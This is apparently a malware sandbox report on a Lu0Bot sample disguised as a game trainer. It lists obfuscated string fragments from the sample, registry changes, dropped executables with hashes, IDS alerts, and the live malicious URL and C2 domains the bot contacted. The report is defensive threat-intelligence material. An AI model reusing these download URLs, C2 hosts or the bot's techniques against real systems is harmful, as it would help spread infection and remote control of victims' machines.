6d05

xJAHO

zoHIY

yKvar

KPWcq

BFEhv

LYcAl

BFEhv

PTLCN

xtDHl

5a1d

xtDHl

184

LYcAl

gBWLN

xtDHl

ubcMM

XGITv

NDEiX

indexOf

swTzr

RkRex

xtDHl

win32

xtDHl

qfuEl

indexOf

fYSZv

wDsOi

186

WcvdP

LYcAl

indexOf

6.1

WcvdP

indexOf

Xeon

zGwCl

FKsIA

zGwCl

VTjWR

GgDdB

ICSLx

LYcAl

bTwcP

igvrq

ubcMM

ICSLx

ECSEV

#56d4#

qqabp

BmErf

GNMzJ

lweQU

eupnK

LYcAl

ELyCm

qfuEl

UAVFP

yuNmd

ykdtl

mEMfX

ydllt

LYcAl

bTwcP

igvrq

ydllt

10.0.19044

CemQK

KETtt

kAuYq

TSkfY

indexOf

swTzr

JWaue

QGkEU

win32

LjQgX

SKYJq

KQxUG

lESyL

EICKi

QdQBE

FGSEG

QdQBE

8215e4

TSkfY

SVcUH

statSync

SxmRx

split

svPcs

length

khfiQ

WlpkV

length

doCxX

isArray

length

split

NRKqX

size

kuqcl

NULLz

uLqHQ

log

writeFileSync

pf1

readFileSync

kuqcl

UvEfz

padyp

statSync

pf1

size

iVwnl

axLdV

Mxgcq

readdirSync

qiJET

statSync

pf2

wHytV

nYOgr

log

gttk

YJHtQ

QJdIM

statSync

size

gXnCd

OwLXj

writeFileSync

pf2

readFileSync

writeFileSync

readFileSync

kXIhd

yPUXA

push

statSync

pf2

NRKqX

size

basename

pf1

basename

pf2

argv

YJHtQ

join

1|2|6|7|5|4|0|3

hUKkQ

split

GcWuZ

pf1

pf2

resolve

pf1

resolve

argv

resolve

pf2

resolve

argv

\Fonts\micross.ttf

hex

Washington1

Microsoft Root

BEjbd

KCXSS

KtzjC

wQJbi

readFileSync

length

UxNgT

length

toString

GYaRC

from

KngiY

toString

GYaRC

aSIWw

indexOf

from

fcFoa

toString

GYaRC

aSIWw

indexOf

KuaRs

FMZtH

5|3|2|4|1|0|6

length

yjwAp

BkMnD

nwSQY

FGDbi

split

push

args

push

path

length

path

name

session

push

pid

qPsLa

ppid

uncaughtException

BOFoU

YVoaN

msiexec.exe

jZhqX

bcCMQ

sBlNU

psls

yeYyx

qMFby

mvCNW

ZpMnM

bHIrW

BOFoU

pid

bbBrX

bwkBb

ppid

Drubx

PuecQ

ppid

PuecQ

ppid

SjuQG

OPqjE

length

ZnDWz

ebvFK

MwkBX

ZnDWz

WRQBY

gStRs

IwBNC

length

toLowerCase

indexOf

Duo

ZnDWz

WRQBY

Phssa

env

sfxname

length

basename

toLowerCase

out

outbuf

toString

outbuf

err

errbuf

toString

errbuf

ehwkb

yFlYS

yAoel

path

toLowerCase

name

toLowerCase

PuecQ

pid

Pkcbj

indexOf

HeRJS

indexOf

push

FHScw

length

session

push

pid

push

path

length

path

name

push

args

obYFQ

HpifN

ppid

HgJaj

length

WRQBY

oEpsP

Drubx

sAWfM

ppid

RuFBJ

ppid

fWKWx

yeYyx

OPqjE

OMPRC

length

from

hex

createDecipheriv

concat

update

final

toString

length

log

garhT

yeYyx

uerepl

bJkRq

removeAllListeners

log

otmdk

stack

log

stack

object

ignore

cmd.exe

mvykt

5|1|0|4|2|3

VDEMo

KjJFi

mvykt

Nawvx

split

createCipheriv

aes-128-cbc

slice

randomBytes

writeFileSync

prs

concat

update

final

from

stringify

maRrO

XGroP

stdio

gFZwL

detached

windowsHide

env

slice

unshift

RmEKx

shift

spawn

unref

2|3|1|4|0

aes-128-cbc

PLeLx

2|4|0|1|3

hShhL

PLeLx

xDGNH

split

concat

update

slice

final

parse

toString

readFileSync

prs

createDecipheriv

buPJa

slice

TNvTi

split

concat

update

slice

final

readFileSync

prs

createDecipheriv

buPJa

slice

parse

toString

randomBytes

EYcMe

TpSWo

rIGhr

KlEUW

vxDoJ

KlEUW

OOsZl

9|3|0|10|7|5|4|6|2|1|8

NYklt

XytJK

BBGWM

gBXWb

MgYWX

bBlGN

CMiID

VpUzp

split

slice

toString

ytwPn

readUInt16BE

slice

createDecipheriv

aes-128-cbc

slice

bQxLq

CQNpO

length

concat

update

slice

CPCpV

final

readUInt16BE

kUDov

length

bEEds

NvYgc

GzeoH

pDPWG

RBODK

nHNVX

6|3|15|11|28|7|23|21|19|29|9|1|12|20|17|18|14|26|8|31|10|13|0|22|4|27|5|25|30|2|24|16

x64

PROCESSOR_ARCHITECTURE

USERNAME

string

USER

Unknown

PROCESSOR_ARCHITEW6432

.exe

HSNJD

gmkYY

C:\

rpcsrv

cyjYv

tmpbuild

LU0TO

.txt

uoBON

aTwZZ

hwv

wfr

atct

iFsSn

argv

indexOf

MWUPP

argv

MWUPP

pjqha

cHXhW

argv

lPeOo

rGWIB

hLobF

argv

YcJrg

LU0TO

ziaEZ

pxiUI

RbAZq

jSgBj

mMYXA

readdirSync

UeFEr

xMcTu

indexOf

umYXd

EGHaW

EsGlg

Oermu

aEaYv

FWdPf

PiyHt

BSCha

pTvLi

C:\

umYXd

AwEKN

YELYn

_i_

kzmFY

xhSjM

thtsc

HAxab

readFileSync

toString

trim

CDAeQ

split

XDera

hostname

length

substr

platform

length

model

trim

speed

gjtnJ

length

substr

uptime

NVtqW

GcRkC

string

OLLVI

indexOf

maKOT

pdXBJ

TFMpp

ccboV

xMcTu

indexOf

versions

node

arch

cwd

tmpdir

lXTPo

tNcbT

freemem

cpus

totalmem

gjtnJ

length

substr

gjtnJ

length

substr

XOGWk

length

release

GYKbo

WzjKK

length

substr

lXTPo

jVOiJ

statSync

ppid

length

tree

WneRM

YcJrg

log

Ycdhb

uCXXt

log

FsDkT

isc

log

sfre

log

ExCmM

lMoNX

aes-128-cbc

JBHlW

UI16LE

STR16

Console

sbchn

oueay

KHBwP

uErvp

SdNaq

LpYvX

KxIpI

yHWdS

CSVQx

aYqqX

VUrjf

xFzkE

SlgYb

vlZWz

SkrMU

prsf

prsi

331db0

sFODx

add

Installed

REG_DWORD

s1b

epPtz

base64

LU0

hNNaV

XsIQt

log

kZpEO

cOoUo

now

prs

pslo

jWPrK

XIGNJ

QfhqL

now

ata

cta

prs

jnWnI

hzZUP

SGDdd

YyQSN

lOynJ

Bxdxx

WUDBf

fill

lOynJ

GtLvE

DTJFS

zzZJM

KjSNj

GtLvE

VvbRQ

kcziQ

vRDoA

uRbju

dtuSh

hzZUP

pslo

lOynJ

9|2|1|6|3|7|4|0|5|8|10

split

concat

update

slice

PIgoE

final

slice

readUInt16BE

createDecipheriv

LVFfp

slice

QRJCj

readUInt16BE

EJxXm

dUsdf

length

slice

toString

YVgKz

KlfqY

length

vRDoA

LpYvX

HWVMV

lOynJ

chdir

log

Unpacking installer archive ...

MeZyi

qSQpE

TNWWy

SGDdd

lOynJ

ubhTr

OQwsQ

HrqeZ

Gjhpj

prs

UwZNV

prs

exit

s1e

argv

HzXRp

UwZNV

argv

slice

TNWWy

BrHSF

CSVQx

QwKDj

resolve

dirname

resolve

Jrwlq

sep

basename

Jrwlq

sep

basename

BrHSF

UmdMo

mkdirSync

writeFileSync

trim

BZVtt

Ziqhv

writeFileSync

readFileSync

zzZJM

RuXaF

ppid

RuXaF

ppid

CTdhA

ItMVH

UuQKi

xFzkE

statSync

writeFileSync

readFileSync

ItMVH

NNoSG

uTCdl

chdir

args

trim

llfYV

joXWx

length

WGway

RUwym

log

stack

log

stack

qABGy

SGDdd

ubhTr

pDQjd

PtceX

Fxiyt

3|2|4|5|1|0|6

split

push

args

push

path

length

path

name

session

push

pid

Iffsb

ezoom

ppid

prsi

log

kUTlh

qpvjl

prs

CTdhA

prs

log

vzlQO

prsi

aQULL

XzkZG

nEGVI

milRK

3|0|1|2|4|5

split

randomBytes

createCipheriv

DTJFS

slice

concat

update

final

from

stringify

writeFileSync

prs

qABGy

reg.exe

sPloU

HKCU\Software\SPoloCleaner

deLAG

OskLU

YQTpV

log

LvJGf

pDQjd

njVaJ

parse

CTdhA

from

env

LU0

XPQYA

toString

statSync

pf2

env

LU0

TiDxv

s1e

tHAxk

euBGH

GJqrD

s1e

pid

session

path

bIqiH

Services

vrsav

YQTpV

Unknown

USER

PROCESSOR_ARCHITECTURE

PROCESSOR_ARCHITEW6432

string

CzSsd

x64

GvCHV

platform

arch

release

uptime

totalmem

freemem

XEFIo

hostname

WEBKT

USERNAME

WEBKT

lufsU

cwd

tmpdir

versions

node

QIgiw

zQuFu

iVFAF

uYlVs

BGrFb

jvmuq

indexOf

uYlVs

string

indexOf

rsypM

nAaLn

cpus

length

ZRPRQ

XrXQK

length

model

trim

speed

createHash

sha256

update

createHash

digest

slice

xpJek

OSVMN

GUZAm

length

substr

length

substr

BluXS

length

substr

fQqDl

length

substr

tPUvy

length

substr

CwarM

sha256

createHash

UUWAF

ETWjT

CwarM

RZdQo

createHash

GlQcv

update

kZibB

digest

slice

lBmvY

aes-128-cbc

fNpsq

randomBytes

alloc

writeUInt16BE

concat

from

createCipheriv

RakuR

slice

concat

update

final

ICMxb

length

lgJsq

jgUjJ

lgJsq

concat

alloc

undefined

CkyNN

7|10|3|8|1|2|5|0|4|9|6

aes-128-cbc

VAwpz

ONvox

KUyTf

uPokQ

undefined

code

IQeKE

gQfwn

signal

cEXlG

split

concat

update

slice

RyFyi

final

readUInt16BE

msXNc

RyFyi

length

readUInt16BE

createDecipheriv

fuMav

slice

oYwrq

length

slice

toString

slice

now

random

recv

NUTmk

log

qlUyC

tkstp

FOySH

sha256

fVDCM

BKyih

zSvXN

JgSJe

RagnH

gttk

uCCOi

test

LuJtm

vVzOv

KpbzS

udp4

message

aYpxc

SGxtm

log

Wtznl

Mnmfx

Wbfcy

now

LNkUx

exit

vSpKC

mjJRG

MSvsB

uYPAd

length

argv

split

join

stringify

gttk

mjJRG

length

KnAhW

log

pcBre

RFqCN

qYTqa

DpqAT

writeFileSync

trim

mkdirSync

exit

mkdirSync

RFqCN

XseeU

createHash

RsRvu

update

digest

createSocket

KkphW

error

ElajD

tkstp

dXjxZ

XoAeD

nlknT

prs

ThRml

prs

exit

ciwXY

att

nXUFB

rEAUe

mwcHf

luIzx

DZQsV

length

model

trim

speed

send

length

VRHhP

length

from

hex

ZinjH

VRHhP

LqBOo

createDecipheriv

concat

update

final

toString

outbuf

push

cmd.exe

msiexec.exe

UI16LE

STR16

reg.exe

Installed

REG_DWORD

xRBkA

slfJt

GzDcB

KjGvF

YzgKb

SwKBS

unshift

lRbcb

GHZBz

KjGvF

DaUSC

KLgEs

DSCRu

length

mbAGw

toLowerCase

indexOf

log

KjGvF

pbuah

KvRNw

EPiVs

workdir

sEZVw

length

pqFNG

length

xieTS

AQTwy

EZKTH

aAyle

log

xieTS

JELgG

add

HKCU\Software\SPoloCleaner

QWElE

ATEAs

NsTMA

FXwcI

BcSIS

6|1|0|7|3|5|2|4

VThcY

ini

isc

from

GqwPH

aHSTW

nbCwj

HCaao

alloc

noaDT

qYdtF

RhhPR

fill

writeFileSync

pf2

readFileSync

allocUnsafe

noaDT

GLoeO

qAfxN

kill

FHdIK

versions

node

indexOf

uerepl

FHdIK

VThcY

aIKcr

uerepl

uncaughtException

removeAllListeners

iiiKA

UeHdV

log

xQGAd

stack

log

stack

EPMQW

split

resolve

pf2

resolve

pf1

FNiyb

resolve

argv

oRdOT

pf1

pf2

resolve

argv

length

dDbZE

length

exit

from

base64

log

JQuhE

OoTuZ

log

grNMK

isc

OoTuZ

ocDIh

Add for printing

Total events

3 068

Read events

3 041

Write events

Delete events

Modification events


(PID) Process:	(2900) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(2900) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(2900) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(2900) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(2900) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:	write	Name:	ProxyEnable
Value: 0
(PID) Process:	(2900) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:	write	Name:	SavedLegacySettings
Value: 4600000059010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:	(2900) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1302019708-1500728564-335382590-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:	write	Name:	DefaultConnectionSettings
Value: 4600000051000000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:	(3380) wmpnscfg.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{937FBC48-2E0D-4F73-8E2C-6BDDC2842551}\{8818F30A-3BCB-454E-A1F3-C59F12875FA2}
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3380) wmpnscfg.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{937FBC48-2E0D-4F73-8E2C-6BDDC2842551}
Operation:	delete key	Name:	(default)
Value:
(PID) Process:	(3380) wmpnscfg.exe	Key:	HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health\{C6BCE7CE-1984-4907-91E2-57FB949EF022}
Operation:	delete key	Name:	(default)
Value:

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
2900	msiexec.exe	C:\Users\admin\AppData\Local\Temp\nehfvlgoxd\frdlcqsqkkw.exe		executable
		MD5:812D99A3D89B8DE1B866AC960031E3DF	SHA256:9C5898B1B354B139794F10594E84E94E991971A54D179B2E9F746319FFAC56AA
3936	frdlcqsqkkw.exe	C:\ProgramData\BuqiqDcX\VTWyiceoiV		text
		MD5:95E8C20E2CF849AA275D3C3B6BA39975	SHA256:DE9CBAEEE69756A8359DE6091DC2891F58CB58638E0FDFA772C898D0E9C914E3
2900	msiexec.exe	C:\Windows\Installer\MSI7CB9.tmp		executable
		MD5:A3AE5D86ECF38DB9427359EA37A5F646	SHA256:C8D190D5BE1EFD2D52F72A72AE9DFA3940AB3FACEB626405959349654FE18B74
3936	frdlcqsqkkw.exe	C:\ProgramData\BuqiqDcX\pQaynpplY.exe		executable
		MD5:812D99A3D89B8DE1B866AC960031E3DF	SHA256:9C5898B1B354B139794F10594E84E94E991971A54D179B2E9F746319FFAC56AA
2900	msiexec.exe	C:\Config.Msi\167bbe.rbs		binary
		MD5:70774742E89A87A7D2821BB54C38C6E6	SHA256:7AEE1FCDC39A9657A5602B34D1A93FB8A10548BF189C0A29278B020ED3041DCB
2900	msiexec.exe	C:\Users\admin\AppData\Local\Temp\~DF95AA4954FA0770D0.TMP		binary
		MD5:BF619EAC0CDF3F68D496EA9344137E8B	SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
3276	frdlcqsqkkw.exe	C:\ProgramData\BuqiqDcX\wdAwBlWFrp		binary
		MD5:FF371E235F1D5B1215E851AEA3F6BB80	SHA256:63E54E851F26B6B8F80B6D31067291A6259B04897BFFAACD31CF9E265FC3423A
2900	msiexec.exe	C:\Users\admin\AppData\Local\Temp\~DF1DF97B4027130F97.TMP		binary
		MD5:41476AA78EA5C9F2C5051F8131F87816	SHA256:B990CA51EEFB0B6F54F98397706B981BF18F2997DBE50FAE92D7AB935DEC3A17
2900	msiexec.exe	C:\Users\admin\AppData\Local\Temp\nehfvlgoxd\lvardebkhw.dat		text
		MD5:95E8C20E2CF849AA275D3C3B6BA39975	SHA256:DE9CBAEEE69756A8359DE6091DC2891F58CB58638E0FDFA772C898D0E9C914E3
2900	msiexec.exe	C:\Users\admin\AppData\Local\Temp\nehfvlgoxd\gcdjeaip.dat		executable
		MD5:AE8CB604FFC716FCC28535B12A04DD10	SHA256:2D3A9A16344E0EA541522D2807B3302F13CC974ED3A111BFBFE520440C6AE9CC

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2900	msiexec.exe	GET	200	176.10.125.51:80	http://231102233316011.tto.kiw46.cloud/f/fsft1102011.msi	unknown	executable	2.80 Mb	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
1080	svchost.exe	224.0.0.252:5355	—	—	—	unknown
2900	msiexec.exe	176.10.125.51:80	231102233316011.tto.kiw46.cloud	Datasource AG	CH	unknown
4	System	192.168.100.255:137	—	—	—	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
2588	svchost.exe	239.255.255.250:1900	—	—	—	whitelisted
3936	frdlcqsqkkw.exe	172.67.184.100:18223	a9d3ce6f362416992521101530004611db11e14b53635001cce9e0221232f.aoa.aent78.sbs	—	—	unknown

DNS requests

Domain	IP	Reputation
231102233316011.tto.kiw46.cloud	176.10.125.51	unknown
a9d3ce6f362416992521101530004611db11e14b53635001cce9e0221232f.aoa.aent78.sbs	172.67.184.100	unknown
a9d3ce6f362416992521101530104611db11e14b53635001cce9e0221232f.aoa.aent78.sbs	172.67.184.100	unknown
a9d3ce6f362416992521101530204611db11e14b53635001cce9e0221232f.aoa.aent78.sbs	172.67.184.100	unknown
a9d3ce6f362416992521101530205611db11e14b53635001cce9e0221232f.aoa.aent78.sbs	172.67.184.100	unknown
a9d3ce6f362416992521101530305611db11e14b53635001cce9e0221232f.aoa.aent78.sbs	172.67.184.100	unknown
a9d3ce6f362416992521101530405611db11e14b53635001cce9e0221232f.aoa.aent78.sbs	172.67.184.100	unknown

Threats

PID	Process	Class	Message
2900	msiexec.exe	Potential Corporate Privacy Violation	ET POLICY Observed MSI Download
1080	svchost.exe	A Network Trojan was detected	ET MALWARE [ANY.RUN] Lu0bot-Style DNS Query in DNS Lookup M1
1080	svchost.exe	A Network Trojan was detected	BOTNET [ANY.RUN] Lu0bot DNS Query M1
1080	svchost.exe	A Network Trojan was detected	ET MALWARE [ANY.RUN] Lu0bot-Style DNS Query in DNS Lookup M1
1080	svchost.exe	A Network Trojan was detected	ET MALWARE [ANY.RUN] Lu0bot-Style DNS Query in DNS Lookup M1
1080	svchost.exe	A Network Trojan was detected	ET MALWARE [ANY.RUN] Lu0bot-Style DNS Query in DNS Lookup M1
1080	svchost.exe	A Network Trojan was detected	ET MALWARE [ANY.RUN] Lu0bot-Style DNS Query in DNS Lookup M1
1080	svchost.exe	A Network Trojan was detected	ET MALWARE [ANY.RUN] Lu0bot-Style DNS Query in DNS Lookup M1
1080	svchost.exe	A Network Trojan was detected	ET MALWARE [ANY.RUN] Lu0bot-Style DNS Query in DNS Lookup M1
1080	svchost.exe	A Network Trojan was detected	ET MALWARE [ANY.RUN] Lu0bot-Style DNS Query in DNS Lookup M1

Add for printing

No debug info

General Info

TrainerFL-build.36449.exe

83D445F26E0296FEC152F61610884ED4

5B5CBC4E35E997E25CF74C6C68B318104C4DF21B

7FE19185D338C2EA659F8E908B06C2E8E96942553BCDDD4BD09DB295AAC6429D

48:Yfc8HYUXEEEEEEEEEwq0T2sy17O7rBS+R:cly17O7rAm

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Drops the executable file immediately after the start

Create files in the Startup directory

LU0BOT has been detected (YARA)

SUSPICIOUS

Starts CMD.EXE for commands execution

Process drops legitimate windows executable

Reads the Windows owner or organization settings

Reads the Internet Settings

Uses WMIC.EXE to obtain data on processes

Application launched itself

INFO

Checks supported languages

Reads the computer name

Reads the machine GUID from the registry

Create files in a temporary directory

Application launched itself

Manual execution by a user

Reads CPU info

Creates files in the program directory

Creates files or folders in the user directory

Malware configuration

Lu0Bot

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Malware configuration

Lu0Bot

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings